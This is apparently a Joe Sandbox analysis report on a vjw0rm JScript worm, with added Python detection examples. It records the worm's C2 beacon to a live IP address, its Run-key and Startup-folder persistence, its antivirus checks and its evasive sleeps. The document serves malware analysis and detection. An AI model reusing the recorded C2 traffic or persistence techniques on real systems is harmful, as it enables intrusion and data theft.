
Analysis Report

Overview

General Information

Joe Sandbox Version:20.0
Analysis ID:381804
Start time:14:00:17
Joe Sandbox Product:Cloud
Start date:03.10.2017
Overall analysis duration:0h 6m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:12PO #927476.js
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
  • JavaScript Instrumentation enabled
Detection:MAL
Classification:mal68.evad.troj.winJS@9/8@0/0
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

Strategy    Score   Range      Detection
Threshold   68      0 - 100    malicious


Confidence

Strategy    Score   Range    Further Analysis Required?
Threshold   5       0 - 5    false


Classification

Signature Overview



AV Detection:

JavaScript source code contains functionality to check for AV products
  Source: 12PO #927476.js | Argument value: ['"AntiVirusProduct"']
  Source: 12PO #927476.js | Return value: ['"AntiVirusProduct"']
  Source: 12PO #927476.js | Argument value: ['"AntiVirusProduct"']

Software Vulnerabilities:

JavaScript source code contains functionality to generate code involving a shell, file or stream
  Source: 12PO #927476.js | Return value: ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"'] (4 occurrences)

Networking:

Posts data to webserver
  Source: unknown | HTTP traffic detected:
    POST /Vre HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    User-Agent: vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\
    Accept-Encoding: gzip, deflate
    Host: 63.141.242.245:7974
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Urls found in memory or binary data
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/3
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/4y#
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/pr
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/vre
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/vre&
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/vre9
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/vre:
  Source: wscript.exe | String found in binary or memory: http://63.141.242.245:7974/vret
Detected TCP or UDP traffic on non-standard ports
  Source: global traffic | TCP traffic: 192.168.1.81:49163 -> 63.141.242.245:7974
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
  Source: 12PO #927476.js | Argument value: ['"http://63.141.242.245:7974/Vre"', '"http://63.141.242.245:7974/","Vre"']
  Source: 12PO #927476.js | Return value: ['"Microsoft.XMLHTTP"']
  Source: 12PO #927476.js | Return value: ['"Microsoft.XMLHTTP"']
  Source: 12PO #927476.js | Return value: ['"User-Agent:"', '"User-Agent:","vjw0rm_7C2D4D8F\\computer\\user\\Microsoft Windows 7 Professional \\undefined\\\\YES\\']
  Source: 12PO #927476.js | Return value: ['"http://63.141.242.245:7974/Vre"', '"POST","http://63.141.242.245:7974/Vre",false', '"open"', '"http://63.141.242.245:7974/"', '"POST"', '"http://63.141.242.245:7974/","Vre"']
  Source: 12PO #927476.js | Return value: ['"Microsoft.XMLHTTP"']
  Source: 12PO #927476.js | Return value: ['"send"']
  Source: 12PO #927476.js | Return value: ['"Microsoft.XMLHTTP"']
Uses known network protocols on non-standard ports
  Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 7974
  Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 7974
  Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 7974
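The empty-body POST above is the only network activity in the report, so it is what a network detection has to key on. The following is an added example, not code from the report or from the sample: it parses the captured request, splits the User-Agent into its backslash-separated fields and lists the indicators that survive a change of C2 address. CAPTURED_REQUEST is constructed from the recorded POST with its headers re-split onto lines; BENIGN_REQUEST is constructed for the negative case. The field interpretation (hostname, user name and OS caption following the id, the id being the value the script reads via volumeserialnumber) is an assumption made here, consistent with the sandbox identity "computer\user\Microsoft Windows 7 Professional"; the remaining fields are kept but not interpreted.

```python
"""Parse a vjw0rm-style HTTP check-in and list the indicators a rule can key on.

Added example (not code from the report or from the sample). The User-Agent
field layout below is an assumption inferred from the captured request.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed from the POST recorded by the sandbox (headers re-split onto lines).
CAPTURED_REQUEST = (
    "POST /Vre HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US\r\n"
    "User-Agent: vjw0rm_7C2D4D8F\\computer\\user\\Microsoft Windows 7 Professional "
    "\\undefined\\\\YES\\FALSE\\\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: 63.141.242.245:7974\r\n"
    "Content-Length: 0\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign request for the negative case.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\r\n"
    "\r\n"
)

UA_PREFIX = re.compile(r"^vjw0rm_([0-9A-Fa-f]{8})\\")
STANDARD_HTTP_PORTS = {80, 443, 8080}


@dataclass
class Beacon:
    method: str
    path: str
    host: str
    port: int
    content_length: int
    bot_id: str
    hostname: str
    username: str
    os_caption: str
    extra_fields: List[str] = field(default_factory=list)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into request-line parts and a lower-cased header dict."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _colon, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def parse_beacon(raw: str) -> Optional[Beacon]:
    """Return a Beacon if the User-Agent carries the worm's id prefix, else None."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    m = UA_PREFIX.match(ua)
    if not m:
        return None
    fields = ua.split("\\")             # the worm joins its fields with backslashes
    fields += [""] * (4 - len(fields))  # tolerate a truncated header
    host, _colon, port = req["headers"].get("host", "").partition(":")
    return Beacon(
        method=req["method"],
        path=req["path"],
        host=host,
        port=int(port) if port.isdigit() else 80,
        content_length=int(req["headers"].get("content-length", "0") or 0),
        bot_id=m.group(1),
        # Assumed layout: fields 1..3 are hostname, user name, OS caption.
        hostname=fields[1],
        username=fields[2],
        os_caption=fields[3].strip(),
        extra_fields=fields[4:],
    )


def beacon_indicators(b: Beacon) -> List[str]:
    """Reasons this request should alert that do not depend on the C2 address."""
    reasons = [f"User-Agent carries vjw0rm bot id {b.bot_id}"]
    if b.method == "POST" and b.content_length == 0:
        reasons.append("empty POST body (host data travels in the User-Agent)")
    if b.port not in STANDARD_HTTP_PORTS:
        reasons.append(f"HTTP on non-standard port {b.port}")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", b.host):
        reasons.append("Host header is a bare IP address")
    return reasons


if __name__ == "__main__":
    beacon = parse_beacon(CAPTURED_REQUEST)
    print(beacon)
    for reason in beacon_indicators(beacon):
        print(" -", reason)
```

The C2 address in the report is a point indicator; the behavioural ones (id-prefixed User-Agent, zero-length POST, bare-IP host on a non-standard port) are what a proxy or IDS rule should carry so it still fires when the operator moves the listener.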

Boot Survival:

Creates an autostart registry key
  Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR (2 occurrences)
Creates a start menu entry (Start Menu\Programs\Startup)
  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Stores files to the Windows start menu directory
  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js\:Zone.Identifier:$DATA (2 occurrences)
Drops script or batch files to the startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup)
  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js (2 occurrences)
  Note: the signature name cites the Windows XP all-users path; the folder actually written on this Windows 7 system is the per-user Startup folder shown above.
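The three persistence facts above (a Run value pointing at a script in %TEMP%, a copy of the script in the per-user Startup folder, and wscript.exe relaunching the script from those locations) are individually noisy but together are a strong signal. The following is an added example, not code from the report or the sample, that correlates such events by script file name. SAMPLE_EVENTS is constructed: its first three entries restate what the sandbox recorded, the last two are constructed benign events for the negative case. The event schema (type / image / key / data / path / cmdline) is an assumption of this example rather than any log product's format.

```python
"""Correlate autostart and process events into a WSH-script persistence finding.

Added example (not code from the report or from the sample). The event schema
and the rule names are assumptions of this example.
"""
import ntpath
import re
from collections import defaultdict
from typing import Dict, List, Set

SCRIPT_EXTS = ("js", "jse", "vbs", "vbe", "wsf", "wsh")
SCRIPT_SUFFIXES = tuple("." + e for e in SCRIPT_EXTS)
# A drive-letter path ending in a WSH script extension, stopped by a quote or whitespace.
SCRIPT_PATH = re.compile(
    r"[A-Za-z]:\\[^'\"\r\n]*?\.(?:" + "|".join(SCRIPT_EXTS) + r")(?=['\"\s]|$)", re.I
)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run"
WSH_HOSTS = ("wscript.exe", "cscript.exe")

SAMPLE_EVENTS = [
    # Restated from the report.
    {"type": "registry_set", "image": r"C:\Windows\System32\wscript.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "JUHZ3GDTCR",
     "data": r'"C:\Users\user~1\AppData\Local\Temp\12PO #927476.js"'},
    {"type": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js"},
    {"type": "process_create", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'"},
    # Constructed benign events: a vendor updater in Run, a script run from Program Files.
    {"type": "registry_set", "image": r"C:\Program Files\Vendor\setup.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "VendorUpdate",
     "data": r'"C:\Program Files\Vendor\update.exe" /background'},
    {"type": "process_create", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe "C:\Program Files\Vendor\inventory.vbs"'},
]


def script_paths(text: str) -> List[str]:
    """Every WSH script path that appears in a command line or registry value."""
    return SCRIPT_PATH.findall(text)


def in_user_writable(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE)


def match_rules(event: dict) -> Dict[str, str]:
    """Map rule name -> script path for every rule this single event satisfies."""
    hits: Dict[str, str] = {}
    t = event["type"]
    if t == "registry_set" and event["key"].lower().endswith(RUN_KEY):
        for p in script_paths(event["data"]):
            if in_user_writable(p):
                hits["run_key_to_script_in_user_dir"] = p
    elif t == "file_create":
        p = event["path"]
        if STARTUP_DIR in p.lower() and p.lower().endswith(SCRIPT_SUFFIXES):
            hits["script_dropped_in_startup_folder"] = p
    elif t == "process_create" and ntpath.basename(event["image"]).lower() in WSH_HOSTS:
        for p in script_paths(event["cmdline"]):
            if in_user_writable(p):
                hits["wsh_launched_script_from_user_dir"] = p
    return hits


def correlate(events: List[dict]) -> Dict[str, Set[str]]:
    """Group rule hits by case-folded script file name, so one script's Run value,
    Startup copy and relaunch land in the same finding."""
    findings: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        for rule, path in match_rules(ev).items():
            findings[ntpath.basename(path).lower()].add(rule)
    return dict(findings)


def high_confidence(findings: Dict[str, Set[str]], min_rules: int = 2) -> List[str]:
    """Scripts that tripped at least min_rules distinct rules."""
    return sorted(name for name, rules in findings.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = correlate(SAMPLE_EVENTS)
    for name, rules in found.items():
        print(name, sorted(rules))
    print("high confidence:", high_confidence(found))
```

Keying on the script's file name rather than its full path is deliberate: the report shows the same name under Desktop, %TEMP% and Startup, and a rule that required identical paths would split one infection into three weak alerts.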

Data Obfuscation:

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
  Source: 12PO #927476.js | String: entropy: 6.04, length: 262, content (truncated in the report): '\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x5
  Source: 12PO #927476.js | Array: entropy: 5.42, length: 133, content (truncated in the report): '\x43\x33\x6e\x44\x69\x43\x68\x72\x4b\x48\x70\x56\x49\x63\x4b\x59''\x77\x70\x66\x44\x6a\x44\x7a\x44\
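The signature above pairs a length threshold with an entropy score; the flagged string starts with the hex-escaped alphabet \x41\x42\x43... (A, B, C, ...), which is the custom-alphabet table a JScript decoder typically carries. The following is an added example, not the sandbox's own implementation, of that triage on a script file: extract string literals, decode their escapes, and keep the ones that are both long and high-entropy. That the metric is Shannon entropy in bits per character measured on the decoded literal, and the thresholds (length >= 50, entropy >= 4.5), are assumptions of this example. SAMPLE_JS is constructed: one literal is the 64-character base64 alphabet written as \xNN escapes, one is a long but repetitive string, two are short.

```python
"""Entropy triage of string literals in a script.

Added example (not the sandbox's implementation). Metric and thresholds are
assumptions of this example; SAMPLE_JS is constructed input.
"""
import math
import re
import string
from typing import Dict, List

# Single- or double-quoted JS literal; backslash escapes may contain the quote.
STRING_LITERAL = re.compile(r"'(?:\\.|[^'\\\n])*'|\"(?:\\.|[^\"\\\n])*\"")
HEX_OR_UNICODE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})")
OTHER_ESCAPE = re.compile(r"\\(.)", re.S)

ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
ENCODED_ALPHABET = "".join("\\x%02x" % ord(c) for c in ALPHABET)
SAMPLE_JS = (
    'var table = "' + ENCODED_ALPHABET + '";\n'
    + "var pad = '" + "a" * 80 + "';\n"   # long but zero-entropy: must not be flagged
    + 'var msg = "hello world";\n'
    + "var cls = 'AntiVirusProduct';\n"
)


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    n = len(s)
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def decode_js_literal(literal: str) -> str:
    """Strip the quotes and resolve \\xNN, \\uNNNN and single-character escapes.
    (An escaped backslash followed by x41 is mis-read as \\x41; acceptable for
    triage, not for exact reconstruction.)"""
    body = literal[1:-1]
    body = HEX_OR_UNICODE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), body)
    return OTHER_ESCAPE.sub(r"\1", body)


def triage(source: str, min_length: int = 50, min_entropy: float = 4.5) -> List[dict]:
    """Return every string literal that is both long and high-entropy after decoding."""
    hits = []
    for m in STRING_LITERAL.finditer(source):
        decoded = decode_js_literal(m.group(0))
        if len(decoded) < min_length:
            continue
        ent = shannon_entropy(decoded)
        if ent < min_entropy:
            continue
        hits.append({
            "offset": m.start(),
            "length": len(decoded),
            "entropy": round(ent, 2),
            # Entropy of the undecoded text, for comparison: the \x prefixes
            # repeat, which drags the score down if you forget to decode.
            "raw_entropy": round(shannon_entropy(m.group(0)[1:-1]), 2),
            "preview": decoded[:32],
        })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_JS):
        print(hit)
```

Decoding before measuring matters: a 64-symbol alphabet scores exactly 6.0 bits per character once decoded, while the same literal measured as raw \xNN text scores far lower because a quarter of its characters are backslashes and another quarter are the letter x.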

Spreading:

Enumerates the file system
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

Binary contains paths to debug symbols
  Source: Binary string: wscript.pdb source: wscript.exe
  Source: Binary string: scrrun.pdb source: wscript.exe
  Source: Binary string: wscript.pdbN source: wscript.exe
Classification label
  Source: classification engine | Classification label: mal68.evad.troj.winJS@9/8@0/0
Creates files inside the user directory
  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Creates temporary files
  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user~1\AppData\Local\Temp\12PO #927476.js
Launches a second explorer.exe instance
  Source: unknown | Process created: C:\Windows\explorer.exe (4 occurrences)
Reads ini files
  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Reads software policies
  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
  Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\12PO #927476.js'
  Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe 'C:\Users\user~1\AppData\Local\Temp\12PO #927476.js'
  Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
  Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding (2 occurrences)
  Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js'
  Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'
  Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js'
  Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'
Uses an in-process (OLE) Automation server
  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 (the JScript language engine)
JavaScript / VBScript file with very long strings (likely obfuscated code)
  Source: 12PO #927476.js | Initial sample: Strings found which are bigger than 50
Reads the hosts file
  Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts (6 occurrences)

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
  Source: wscript.exe | Binary or memory string: Progman
  Source: wscript.exe | Binary or memory string: Program Manager
  Source: wscript.exe | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for debuggers (devices)
  Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  Source: C:\Windows\System32\wscript.exe | System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Enumerates the file system
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
  Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Found WSH timer for Javascript or VBS script (likely evasive script)
  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (3 occurrences)
May sleep (evasive loops) to hinder dynamic analysis
  Source: C:\Windows\System32\wscript.exe TID: 3412 | Thread sleep time: -420000s >= -60s
  Source: C:\Windows\explorer.exe TID: 3564 | Thread sleep time: -60000s >= -60s
  Source: C:\Windows\explorer.exe TID: 3592 | Thread sleep time: -60000s >= -60s (2 occurrences)
  Source: C:\Windows\explorer.exe TID: 3608 | Thread sleep time: -60000s >= -60s
  Source: C:\Windows\explorer.exe TID: 3648 | Thread sleep time: -60000s >= -60s
  Source: C:\Windows\System32\wscript.exe TID: 3696 | Thread sleep time: -1020000s >= -60s
  Source: C:\Windows\System32\wscript.exe TID: 3696 | Thread sleep time: -60000s >= -60s
  Source: C:\Windows\System32\wscript.exe TID: 3728 | Thread sleep time: -840000s >= -60s
  Source: C:\Windows\System32\wscript.exe TID: 3728 | Thread sleep time: -60000s >= -60s
JavaScript source code contains functionality to check for volume information
  Source: 12PO #927476.js | Return value: ['"volumeserialnumber"']

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Uses known network protocols on non-standard ports
  Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 7974
  Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 7974
  Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 7974

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
  Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct (6 occurrences)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 381804
Sample: 12PO #927476.js
Start date: 03/10/2017
Architecture: WINDOWS
Score: 68

Graph contents (rendered image not included; 2 processes hidden because the level exceeded its maximum capacity):
  • main -> wscript.exe (node 1; counters 2, 19; marked malicious)
  • main -> explorer.exe (node 5; counter 2)
  • main -> explorer.exe (node 6)
  • explorer.exe (node 5) -> wscript.exe (node 7; counter 16)
  • explorer.exe (node 6) -> wscript.exe (node 8; counter 16)
  • Signature attached to nodes 1, 7 and 8: Drops script or batch files to the startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup)

Simulations

Behavior and APIs

Time      Type              Description
14:01:04  API Interceptor   462x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms
14:01:10  API Interceptor   5x Sleep call for process: explorer.exe modified from: 60000ms to: 500ms
14:01:10  Autostart         Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR "C:\Users\user~1\AppData\Local\Temp\12PO #927476.js"
14:01:10  Autostart         Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context
